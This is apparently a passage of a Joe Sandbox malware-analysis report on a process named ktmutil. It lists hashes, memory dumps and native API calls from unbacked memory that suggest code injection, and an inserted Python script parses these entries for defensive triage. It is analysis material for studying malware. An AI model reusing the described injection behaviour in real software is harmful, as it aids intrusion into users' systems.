                                                                          • Opcode ID: 651d02b360af7c7c8688c48c9a1e2283c0a48e8f57f2dad256604bae42aee937
                                                                          • Instruction ID: 468ca725bf637fb04306f9591e2c2d8ca84f0b4d537d4908b12f3263644e632d
                                                                          • Opcode Fuzzy Hash: 651d02b360af7c7c8688c48c9a1e2283c0a48e8f57f2dad256604bae42aee937
                                                                          • Instruction Fuzzy Hash: 372128B9A00208AFDB10DF98CC81EAFB7B9EF89710F108519F909A7240D770A911CFA5
                                                                          APIs
                                                                          • NtClose.NTDLL(?,?,001F0001,?,00000000,?,00000000,00000104), ref: 028E9567
                                                                          Memory Dump Source
                                                                          • Source File: 00000009.00000002.2646269298.00000000028C0000.00000040.80000000.00040000.00000000.sdmp, Offset: 028C0000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_9_2_28c0000_ktmutil.jbxd
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID: Close
                                                                          • String ID:
                                                                          • API String ID: 3535843008-0
                                                                          • Opcode ID: be0cb4410887f87cacd915793feeba3c97a0129e18297d3ed90cc9ef85f66603
                                                                          • Instruction ID: 727b4b9819502afb5c6c0655fa2747cbb98daa41567b14b7c777f03e943b2519
                                                                          • Opcode Fuzzy Hash: be0cb4410887f87cacd915793feeba3c97a0129e18297d3ed90cc9ef85f66603
                                                                          • Instruction Fuzzy Hash: DEE0463A2002047BC620EA59CC41F9BB76EDBC6724F41841AFA08A7241DB70B9118BB5
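                                                                          The "APIs" and "Memory Dump Source" entries above record each native call together with the dump region the calling code lives in, and "based on PE: false" marks a region that is not backed by a loaded image. The Python below is an added example, not Joe Sandbox code and not part of this report, that parses those entries as laid out on this page and groups the calls by region. The sample input is copied from the four entries above plus one region with an empty API list; the regex shapes and the constant table are assumptions of this example. Because the report prints raw stack slots rather than decoded parameters, constant matches are hints by value only, not a claim about which parameter a slot is.

```python
"""Parse the per-function "APIs" / "Memory Dump Source" entries of a Joe Sandbox
report and pair each native API call with the memory region it was executed from.

Added example for this report page; it is not Joe Sandbox code. The regex shapes
assume the plain-text layout shown on this page (bullets rendered as "•").
"""
import re
from dataclasses import dataclass

# Constructed input: entries copied from the function listing above. The last
# entry has an empty "APIs" list, which the parser must tolerate.
REPORT_EXCERPT = """
APIs
• NtCreateFile.NTDLL(?,5F8FFFB0,?,?,?,?,?,?,?,?,?), ref: 028E930E
Memory Dump Source
• Source File: 00000009.00000002.2646269298.00000000028C0000.00000040.80000000.00040000.00000000.sdmp, Offset: 028C0000, based on PE: false
APIs
• NtReadFile.NTDLL(?,5F8FFFB0,?,?,?,?,?,?,?), ref: 028E9469
Memory Dump Source
• Source File: 00000009.00000002.2646269298.00000000028C0000.00000040.80000000.00040000.00000000.sdmp, Offset: 028C0000, based on PE: false
APIs
• NtAllocateVirtualMemory.NTDLL(028D1ECE,5F8FFFB0,028E812F,00000000,00000004,00003000,?,?,?,?,?,028E812F,028D1ECE), ref: 028E9758
Memory Dump Source
• Source File: 00000009.00000002.2646269298.00000000028C0000.00000040.80000000.00040000.00000000.sdmp, Offset: 028C0000, based on PE: false
APIs
• NtClose.NTDLL(?,?,001F0001,?,00000000,?,00000000,00000104), ref: 028E9567
Memory Dump Source
• Source File: 00000009.00000002.2646269298.00000000028C0000.00000040.80000000.00040000.00000000.sdmp, Offset: 028C0000, based on PE: false
APIs
Memory Dump Source
• Source File: 00000009.00000002.2647332323.0000000003300000.00000040.00001000.00020000.00000000.sdmp, Offset: 03300000, based on PE: true
"""

API_RE = re.compile(r"^•\s*(\w+)\.(\w+)\((.*)\),\s*ref:\s*([0-9A-Fa-f]+)\s*$")
SRC_RE = re.compile(r"Source File:\s*(\S+),\s*Offset:\s*([0-9A-Fa-f]+),\s*based on PE:\s*(true|false)")

# Values worth a second look when they show up in the raw stack dump (assumed
# table). Joe Sandbox prints stack slots, not decoded parameters, so a match is
# a hint by value only and says nothing about which parameter the slot is.
KNOWN_CONSTANTS = {
    0x3000: "MEM_COMMIT|MEM_RESERVE",
    0x0004: "PAGE_READWRITE",
    0x0040: "PAGE_EXECUTE_READWRITE",
    0x1F0001: "MUTANT_ALL_ACCESS",
    0x104: "MAX_PATH (260)",
}


@dataclass(frozen=True)
class ApiCall:
    name: str
    module: str
    args: tuple      # int per stack slot, None where the report shows "?"
    ref: int         # address of the call site
    region: str      # "Offset" of the memory dump the calling code lives in
    pe_backed: bool  # False = code in memory that is not backed by a PE image


def _parse_args(raw: str) -> tuple:
    out = []
    for slot in raw.split(","):
        slot = slot.strip()
        if slot == "":
            continue
        out.append(None if slot == "?" else int(slot, 16))
    return tuple(out)


def parse_entries(text: str) -> list:
    """Return ApiCall records in report order. API bullets are buffered until
    the Memory Dump Source line that follows them supplies the region."""
    calls, pending = [], []
    for line in text.splitlines():
        line = line.strip()
        m = API_RE.match(line)
        if m:
            pending.append(m.groups())
            continue
        m = SRC_RE.search(line)
        if m:
            _, offset, pe = m.groups()
            for name, module, raw, ref in pending:
                calls.append(ApiCall(name, module, _parse_args(raw), int(ref, 16),
                                     offset.upper(), pe == "true"))
            pending = []
    return calls


def annotate_constants(call: ApiCall) -> list:
    """Flag stack slots whose value equals a well-known Windows constant."""
    return [f"0x{v:X}={KNOWN_CONSTANTS[v]}" for v in call.args if v in KNOWN_CONSTANTS]


def summarize_regions(text: str) -> dict:
    """Per memory region: PE-backed flag and the ordered list of native APIs
    called from it. Regions with no API calls still appear (empty list)."""
    regions = {}
    for line in text.splitlines():
        m = SRC_RE.search(line)
        if m:
            regions.setdefault(m.group(2).upper(),
                               {"pe_backed": m.group(3) == "true", "apis": []})
    for c in parse_entries(text):
        regions[c.region]["apis"].append(c.name)
    return regions


def calls_from_unbacked_memory(calls: list) -> list:
    """Native calls issued from memory not backed by a PE image: the sequence
    to pull out first when triaging injected or self-loaded code."""
    return [c for c in calls if not c.pe_backed]


if __name__ == "__main__":
    calls = parse_entries(REPORT_EXCERPT)
    for c in calls_from_unbacked_memory(calls):
        print(f"{c.ref:08X} {c.name:<24} region {c.region} {annotate_constants(c)}")
    print(summarize_regions(REPORT_EXCERPT))
```

Run on the excerpt, the script lists the four native calls from the 028C0000 dump (not PE-backed) in the order NtCreateFile, NtReadFile, NtAllocateVirtualMemory, NtClose, and shows the 03300000 dump (PE-backed) with no recorded API calls; the value hints it prints are where to start when checking the disassembly for what each slot actually is.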
                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 00000009.00000002.2647332323.0000000003300000.00000040.00001000.00020000.00000000.sdmp, Offset: 03300000, based on PE: true
                                                                          • Associated: 00000009.00000002.2647332323.0000000003429000.00000040.00001000.00020000.00000000.sdmp
                                                                          • Associated: 00000009.00000002.2647332323.000000000342D000.00000040.00001000.00020000.00000000.sdmp
                                                                          • Associated: 00000009.00000002.2647332323.000000000349E000.00000040.00001000.00020000.00000000.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_9_2_3300000_ktmutil.jbxd
                                                                          Similarity
                                                                          • API ID: InitializeThunk
                                                                          • String ID:
                                                                          • API String ID: 2994545307-0
                                                                          • Opcode ID: 75552b1e07c6e4185d75ac4f8b1edc664b089787957fab9469c1bbcf9c9009c2
                                                                          • Instruction ID: d5a98c191dfdf5d9b8b719079899324961807533472b958f603dc71773dd1e9f
                                                                          • Opcode Fuzzy Hash: 75552b1e07c6e4185d75ac4f8b1edc664b089787957fab9469c1bbcf9c9009c2
                                                                          • Instruction Fuzzy Hash: 45900235615904129140B25C48C4586400697E0301B95C011E0424958C8B188A565361
                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 00000009.00000002.2647332323.0000000003300000.00000040.00001000.00020000.00000000.sdmp, Offset: 03300000, based on PE: true
                                                                          • Associated: 00000009.00000002.2647332323.0000000003429000.00000040.00001000.00020000.00000000.sdmp
                                                                          • Associated: 00000009.00000002.2647332323.000000000342D000.00000040.00001000.00020000.00000000.sdmp
                                                                          • Associated: 00000009.00000002.2647332323.000000000349E000.00000040.00001000.00020000.00000000.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_9_2_3300000_ktmutil.jbxd
                                                                          Similarity
                                                                          • API ID: InitializeThunk
                                                                          • String ID:
                                                                          • API String ID: 2994545307-0
                                                                          • Opcode ID: d2f45556e3aed779f8c0fdb49f10aaff8d357718a1934262127094667836fe4d
                                                                          • Instruction ID: 920e526539d003c0cc0137c0e6e19b5e381f9a1d999d41ecfaf7162eeaafbdb9
                                                                          • Opcode Fuzzy Hash: d2f45556e3aed779f8c0fdb49f10aaff8d357718a1934262127094667836fe4d
                                                                          • Instruction Fuzzy Hash: ED900265611604424140B25C4884446600697E13013D5C115A0554964C871C89559269
                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 00000009.00000002.2647332323.0000000003300000.00000040.00001000.00020000.00000000.sdmp, Offset: 03300000, based on PE: true
                                                                          • Associated: 00000009.00000002.2647332323.0000000003429000.00000040.00001000.00020000.00000000.sdmp
                                                                          • Associated: 00000009.00000002.2647332323.000000000342D000.00000040.00001000.00020000.00000000.sdmp
                                                                          • Associated: 00000009.00000002.2647332323.000000000349E000.00000040.00001000.00020000.00000000.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_9_2_3300000_ktmutil.jbxd
                                                                          Similarity
                                                                          • API ID: InitializeThunk
                                                                          • String ID:
                                                                          • API String ID: 2994545307-0
                                                                          • Opcode ID: 84cb24ef5bb491da0b795af1c231af124ed6ea05fa300061b8cfca7c7bf262e7
                                                                          • Instruction ID: a8b59e76248eee6336b97430e42376aca4eb86ee89eab12a08214239a48b07cb
                                                                          • Opcode Fuzzy Hash: 84cb24ef5bb491da0b795af1c231af124ed6ea05fa300061b8cfca7c7bf262e7
                                                                          • Instruction Fuzzy Hash: EE900265212504034105B25C4494656400B87E0301B95C021E1014994DC62989916125
                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 00000009.00000002.2647332323.0000000003300000.00000040.00001000.00020000.00000000.sdmp, Offset: 03300000, based on PE: true
                                                                          • Associated: 00000009.00000002.2647332323.0000000003429000.00000040.00001000.00020000.00000000.sdmp
                                                                          • Associated: 00000009.00000002.2647332323.000000000342D000.00000040.00001000.00020000.00000000.sdmp
                                                                          • Associated: 00000009.00000002.2647332323.000000000349E000.00000040.00001000.00020000.00000000.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_9_2_3300000_ktmutil.jbxd
                                                                          Similarity
                                                                          • API ID: InitializeThunk
                                                                          • String ID:
                                                                          • API String ID: 2994545307-0
                                                                          • Opcode ID: 7c78d94eda59afd7e6ae72f6ec2325c92fc6287e61bebe1bb55524158a8eaa7f
                                                                          • Instruction ID: 3dbaf9f47020115a3899ccb3f922645b7c39efb52f6cc337aa480ee7b3a60f73
                                                                          • Opcode Fuzzy Hash: 7c78d94eda59afd7e6ae72f6ec2325c92fc6287e61bebe1bb55524158a8eaa7f
                                                                          • Instruction Fuzzy Hash: 1090023521150C02D180B25C448468A000687D1301FD5C015A0025A58DCB198B5977A1
                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 00000009.00000002.2647332323.0000000003300000.00000040.00001000.00020000.00000000.sdmp, Offset: 03300000, based on PE: true
                                                                          • Associated: 00000009.00000002.2647332323.0000000003429000.00000040.00001000.00020000.00000000.sdmp
                                                                          • Associated: 00000009.00000002.2647332323.000000000342D000.00000040.00001000.00020000.00000000.sdmp
                                                                          • Associated: 00000009.00000002.2647332323.000000000349E000.00000040.00001000.00020000.00000000.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_9_2_3300000_ktmutil.jbxd
                                                                          Similarity
                                                                          • API ID: InitializeThunk
                                                                          • String ID:
                                                                          • API String ID: 2994545307-0
                                                                          • Opcode ID: b9c7dea80362b86bee4b195baf0a22ba829c54f73b5d726eb18e7d08b501da27
                                                                          • Instruction ID: 28759d1ad1f00871967b723a6d8aa7f244834c3d23a70a0b2bf4773ab304fdc4
                                                                          • Opcode Fuzzy Hash: b9c7dea80362b86bee4b195baf0a22ba829c54f73b5d726eb18e7d08b501da27
                                                                          • Instruction Fuzzy Hash: 6690023521554C42D140B25C4484A86001687D0305F95C011A0064A98D97298E55B661
                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 00000009.00000002.2647332323.0000000003300000.00000040.00001000.00020000.00000000.sdmp, Offset: 03300000, based on PE: true
                                                                          • Associated: 00000009.00000002.2647332323.0000000003429000.00000040.00001000.00020000.00000000.sdmp
                                                                          • Associated: 00000009.00000002.2647332323.000000000342D000.00000040.00001000.00020000.00000000.sdmp
                                                                          • Associated: 00000009.00000002.2647332323.000000000349E000.00000040.00001000.00020000.00000000.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_9_2_3300000_ktmutil.jbxd
                                                                          Similarity
                                                                          • API ID: InitializeThunk
                                                                          • String ID:
                                                                          • API String ID: 2994545307-0
                                                                          • Opcode ID: 0971ac45c2cf5a644ecf2d8f3b31643e0e5329904eea09cdba2114b49527fc0c
                                                                          • Instruction ID: ecc9af775b7d02f0ebac1c8442c9a19bde41bcb3d92467f6a3d46bf4c075c759
                                                                          • Opcode Fuzzy Hash: 0971ac45c2cf5a644ecf2d8f3b31643e0e5329904eea09cdba2114b49527fc0c
                                                                          • Instruction Fuzzy Hash: 3990043D331504030105F75C07C45470047C7D53513D5C031F1015D54CD735CD715131
                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 00000009.00000002.2647332323.0000000003300000.00000040.00001000.00020000.00000000.sdmp, Offset: 03300000, based on PE: true
                                                                          • Associated: 00000009.00000002.2647332323.0000000003429000.00000040.00001000.00020000.00000000.sdmp
                                                                          • Associated: 00000009.00000002.2647332323.000000000342D000.00000040.00001000.00020000.00000000.sdmp
                                                                          • Associated: 00000009.00000002.2647332323.000000000349E000.00000040.00001000.00020000.00000000.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_9_2_3300000_ktmutil.jbxd
                                                                          Similarity
                                                                          • API ID: InitializeThunk
                                                                          • String ID:
                                                                          • API String ID: 2994545307-0
                                                                          • Opcode ID: 6cfd80f994b15bd2d400a64065317a073115ed75a56999bf174c31c35cc777ea
                                                                          • Instruction ID: c232f6374b3205817b6c85eea1fc62475565e59dde1465afa510157b0007ae46
                                                                          • Opcode Fuzzy Hash: 6cfd80f994b15bd2d400a64065317a073115ed75a56999bf174c31c35cc777ea
                                                                          • Instruction Fuzzy Hash: 0290026535150842D100B25C4494B460006C7E1301F95C015E1064958D871DCD526126
                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 00000009.00000002.2647332323.0000000003300000.00000040.00001000.00020000.00000000.sdmp, Offset: 03300000, based on PE: true
                                                                          • Associated: 00000009.00000002.2647332323.0000000003429000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                          • Associated: 00000009.00000002.2647332323.000000000342D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                          • Associated: 00000009.00000002.2647332323.000000000349E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_9_2_3300000_ktmutil.jbxd
                                                                          Similarity
                                                                          • API ID: InitializeThunk
                                                                          • String ID:
                                                                          • API String ID: 2994545307-0
                                                                          • Opcode ID: 538dbf435d4e3397cd0d13e39e34d7fdbae0ae7803f32cbc7f0556d9e586980e
                                                                          • Instruction ID: 7fdf2f7893274e2b84255799d6b591e803e9289a21dbcaaafb6ae1085fa70585
                                                                          • Opcode Fuzzy Hash: 538dbf435d4e3397cd0d13e39e34d7fdbae0ae7803f32cbc7f0556d9e586980e
                                                                          • Instruction Fuzzy Hash: 69900225611504424140B26C88C49464006ABE1311795C121A0998954D865D89655665
                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 00000009.00000002.2647332323.0000000003300000.00000040.00001000.00020000.00000000.sdmp, Offset: 03300000, based on PE: true
                                                                          • Associated: 00000009.00000002.2647332323.0000000003429000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                          • Associated: 00000009.00000002.2647332323.000000000342D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                          • Associated: 00000009.00000002.2647332323.000000000349E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_9_2_3300000_ktmutil.jbxd
                                                                          Similarity
                                                                          • API ID: InitializeThunk
                                                                          • String ID:
                                                                          • API String ID: 2994545307-0
                                                                          • Opcode ID: c468b983ddc87570505cfa76e3ddcaaaf0ee1242d7de74aaabfa0e46b751562e
                                                                          • Instruction ID: bfcb645c586c8abb8bb6c21a126913d347ce247d44cd253be5e392941f5c6944
                                                                          • Opcode Fuzzy Hash: c468b983ddc87570505cfa76e3ddcaaaf0ee1242d7de74aaabfa0e46b751562e
                                                                          • Instruction Fuzzy Hash: DC900225221D0442D200B66C4C94B47000687D0303F95C115A0154958CCA1989615521
                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 00000009.00000002.2647332323.0000000003300000.00000040.00001000.00020000.00000000.sdmp, Offset: 03300000, based on PE: true
                                                                          • Associated: 00000009.00000002.2647332323.0000000003429000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                          • Associated: 00000009.00000002.2647332323.000000000342D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                          • Associated: 00000009.00000002.2647332323.000000000349E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_9_2_3300000_ktmutil.jbxd
                                                                          Similarity
                                                                          • API ID: InitializeThunk
                                                                          • String ID:
                                                                          • API String ID: 2994545307-0
                                                                          • Opcode ID: 0b80047e42b5555e53492ea825af0c9945a9870a6bc6ab94e41d353735ea308b
                                                                          • Instruction ID: 02bb8330d83defe906d0fe0268033779035ba527b24baf9d8f6199511749f819
                                                                          • Opcode Fuzzy Hash: 0b80047e42b5555e53492ea825af0c9945a9870a6bc6ab94e41d353735ea308b
                                                                          • Instruction Fuzzy Hash: 8690022561150902D101B25C4484656000B87D0341FD5C022A1024959ECB298A92A131
                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 00000009.00000002.2647332323.0000000003300000.00000040.00001000.00020000.00000000.sdmp, Offset: 03300000, based on PE: true
                                                                          • Associated: 00000009.00000002.2647332323.0000000003429000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                          • Associated: 00000009.00000002.2647332323.000000000342D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                          • Associated: 00000009.00000002.2647332323.000000000349E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_9_2_3300000_ktmutil.jbxd
                                                                          Similarity
                                                                          • API ID: InitializeThunk
                                                                          • String ID:
                                                                          • API String ID: 2994545307-0
                                                                          • Opcode ID: bb6863bd09aa361c170bf69442498f9104f130609ab591088f968e1845b57bf2
                                                                          • Instruction ID: 1183b121433e8762617837df54845e25fc76af4eda543298f5fb5ecaae061918
                                                                          • Opcode Fuzzy Hash: bb6863bd09aa361c170bf69442498f9104f130609ab591088f968e1845b57bf2
                                                                          • Instruction Fuzzy Hash: 1690026521190803D140B65C4884647000687D0302F95C011A2064959E8B2D8D516135
                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 00000009.00000002.2647332323.0000000003300000.00000040.00001000.00020000.00000000.sdmp, Offset: 03300000, based on PE: true
                                                                          • Associated: 00000009.00000002.2647332323.0000000003429000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                          • Associated: 00000009.00000002.2647332323.000000000342D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                          • Associated: 00000009.00000002.2647332323.000000000349E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_9_2_3300000_ktmutil.jbxd
                                                                          Similarity
                                                                          • API ID: InitializeThunk
                                                                          • String ID:
                                                                          • API String ID: 2994545307-0
                                                                          • Opcode ID: 8534f6cce264b43cda3b4f4ffcfbfbef16d9b0b99e1907701b24002173666af1
                                                                          • Instruction ID: 411f182374e37e878e8e27d20935c2da90ae32a57e068dd7e3cfd9d9f74c360a
                                                                          • Opcode Fuzzy Hash: 8534f6cce264b43cda3b4f4ffcfbfbef16d9b0b99e1907701b24002173666af1
                                                                          • Instruction Fuzzy Hash: CD90022531150403D140B25C54986464006D7E1301F95D011E0414958CDA1989565222
                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 00000009.00000002.2647332323.0000000003300000.00000040.00001000.00020000.00000000.sdmp, Offset: 03300000, based on PE: true
                                                                          • Associated: 00000009.00000002.2647332323.0000000003429000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                          • Associated: 00000009.00000002.2647332323.000000000342D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                          • Associated: 00000009.00000002.2647332323.000000000349E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_9_2_3300000_ktmutil.jbxd
                                                                          Similarity
                                                                          • API ID: InitializeThunk
                                                                          • String ID:
                                                                          • API String ID: 2994545307-0
                                                                          • Opcode ID: 8dacbe8baa2cbc1b14b78aaea83bc0e2870c8d416a470fbc9a891d0e263e2750
                                                                          • Instruction ID: 193d43bdb45f40838e855fcba748fd1b12ff78a98a12481ae70b60dccf78ad44
                                                                          • Opcode Fuzzy Hash: 8dacbe8baa2cbc1b14b78aaea83bc0e2870c8d416a470fbc9a891d0e263e2750
                                                                          • Instruction Fuzzy Hash: D690022D22350402D180B25C548864A000687D1302FD5D415A001595CCCA1989695321
                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 00000009.00000002.2647332323.0000000003300000.00000040.00001000.00020000.00000000.sdmp, Offset: 03300000, based on PE: true
                                                                          • Associated: 00000009.00000002.2647332323.0000000003429000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                          • Associated: 00000009.00000002.2647332323.000000000342D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                          • Associated: 00000009.00000002.2647332323.000000000349E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_9_2_3300000_ktmutil.jbxd
                                                                          Similarity
                                                                          • API ID: InitializeThunk
                                                                          • String ID:
                                                                          • API String ID: 2994545307-0
                                                                          • Opcode ID: e89b7a712128bb30cfbe3ae392b5c62dbf40aba73e0a8e3fa037a1a78ae3e7e4
                                                                          • Instruction ID: 0d9095a2597327938c26c873e44070ae3e6707a19be42baced3f7cd855470895
                                                                          • Opcode Fuzzy Hash: e89b7a712128bb30cfbe3ae392b5c62dbf40aba73e0a8e3fa037a1a78ae3e7e4
                                                                          • Instruction Fuzzy Hash: 9290023521150813D111B25C4584747000A87D0341FD5C412A042495CD975A8A52A121
                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 00000009.00000002.2647332323.0000000003300000.00000040.00001000.00020000.00000000.sdmp, Offset: 03300000, based on PE: true
                                                                          • Associated: 00000009.00000002.2647332323.0000000003429000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                          • Associated: 00000009.00000002.2647332323.000000000342D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                          • Associated: 00000009.00000002.2647332323.000000000349E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_9_2_3300000_ktmutil.jbxd
                                                                          Similarity
                                                                          • API ID: InitializeThunk
                                                                          • String ID:
                                                                          • API String ID: 2994545307-0
                                                                          • Opcode ID: 2dd1c571381729c243c4b61e0c2a7086b7eeabd2242ce915849b81fbf0cd6c33
                                                                          • Instruction ID: c769fe14969c3343449081269f9a580f3739669f05d442388da17d85f1d446e4
                                                                          • Opcode Fuzzy Hash: 2dd1c571381729c243c4b61e0c2a7086b7eeabd2242ce915849b81fbf0cd6c33
                                                                          • Instruction Fuzzy Hash: 07900225252545525545F25C4484547400797E03417D5C012A1414D54C862A9956D621
                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 00000009.00000002.2647332323.0000000003300000.00000040.00001000.00020000.00000000.sdmp, Offset: 03300000, based on PE: true
                                                                          • Associated: 00000009.00000002.2647332323.0000000003429000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                          • Associated: 00000009.00000002.2647332323.000000000342D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                          • Associated: 00000009.00000002.2647332323.000000000349E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_9_2_3300000_ktmutil.jbxd
                                                                          Similarity
                                                                          • API ID: InitializeThunk
                                                                          • String ID:
                                                                          • API String ID: 2994545307-0
                                                                          • Opcode ID: 5990b3cc9bae5a6aa0b6e68740f43dfe4deaecf4e86b7e31d7288fa0c6bb66c7
                                                                          • Instruction ID: ce3d4cfb76f7b273ede5a09dd5045073773c09cc8d3cb6af6ef22905649b6fe6
                                                                          • Opcode Fuzzy Hash: 5990b3cc9bae5a6aa0b6e68740f43dfe4deaecf4e86b7e31d7288fa0c6bb66c7
                                                                          • Instruction Fuzzy Hash: 3990023521158C02D110B25C848478A000687D0301F99C411A4424A5CD879989917121
                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 00000009.00000002.2647332323.0000000003300000.00000040.00001000.00020000.00000000.sdmp, Offset: 03300000, based on PE: true
                                                                          • Associated: 00000009.00000002.2647332323.0000000003429000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                          • Associated: 00000009.00000002.2647332323.000000000342D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                          • Associated: 00000009.00000002.2647332323.000000000349E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_9_2_3300000_ktmutil.jbxd
                                                                          Similarity
                                                                          • API ID: InitializeThunk
                                                                          • String ID:
                                                                          • API String ID: 2994545307-0
                                                                          • Opcode ID: c50dc4f1eca9a7bf38fba437ea7005dd29ae283e7b731c70651e9f6a958f4828
                                                                          • Instruction ID: e1642e7ff1da1cd69c9bc8e63f981f7ceb497a26e99b633d4ca2320c79657d2a
                                                                          • Opcode Fuzzy Hash: c50dc4f1eca9a7bf38fba437ea7005dd29ae283e7b731c70651e9f6a958f4828
                                                                          • Instruction Fuzzy Hash: 6D90023521150C42D100B25C4484B86000687E0301F95C016A0124A58D8719C9517521
                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 00000009.00000002.2647332323.0000000003300000.00000040.00001000.00020000.00000000.sdmp, Offset: 03300000, based on PE: true
                                                                          • Associated: 00000009.00000002.2647332323.0000000003429000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                          • Associated: 00000009.00000002.2647332323.000000000342D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                          • Associated: 00000009.00000002.2647332323.000000000349E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_9_2_3300000_ktmutil.jbxd
                                                                          Similarity
                                                                          • API ID: InitializeThunk
                                                                          • String ID:
                                                                          • API String ID: 2994545307-0
                                                                          • Opcode ID: b774feb7552b0b072025c6f3e8a385cc4f9a36986d3e9baccf73561a08f35309
                                                                          • Instruction ID: a482f0dfe9d7f362244ffa314bc6d12d10b0572fbb586c0f4d59adc17389ad97
                                                                          • Opcode Fuzzy Hash: b774feb7552b0b072025c6f3e8a385cc4f9a36986d3e9baccf73561a08f35309
                                                                          • Instruction Fuzzy Hash: 2090023521150802D100B69C5488686000687E0301F95D011A5024959EC76989916131
                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 00000009.00000002.2647332323.0000000003300000.00000040.00001000.00020000.00000000.sdmp, Offset: 03300000, based on PE: true
                                                                          • Associated: 00000009.00000002.2647332323.0000000003429000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                          • Associated: 00000009.00000002.2647332323.000000000342D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                          • Associated: 00000009.00000002.2647332323.000000000349E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_9_2_3300000_ktmutil.jbxd
                                                                          Similarity
                                                                          • API ID: InitializeThunk
                                                                          • String ID:
                                                                          • API String ID: 2994545307-0
                                                                          • Opcode ID: 0bbca2025e6bc6f76bcfc8ab3558d20c892d97d600845a5c50ff30d0c5d5daa4
                                                                          • Instruction ID: 917f52dbba1b796bd2681633bed76dd86b4ca3e545f7dbf4bdaadc366336074c
                                                                          • Opcode Fuzzy Hash: 0bbca2025e6bc6f76bcfc8ab3558d20c892d97d600845a5c50ff30d0c5d5daa4
                                                                          • Instruction Fuzzy Hash: 7390023561560802D100B25C4594746100687D0301FA5C411A042496CD87998A5165A2
                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 00000009.00000002.2647332323.0000000003300000.00000040.00001000.00020000.00000000.sdmp, Offset: 03300000, based on PE: true
                                                                          • Associated: 00000009.00000002.2647332323.0000000003429000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                          • Associated: 00000009.00000002.2647332323.000000000342D000.00000040.00001000.00020000.00000000.sdmpDownload File
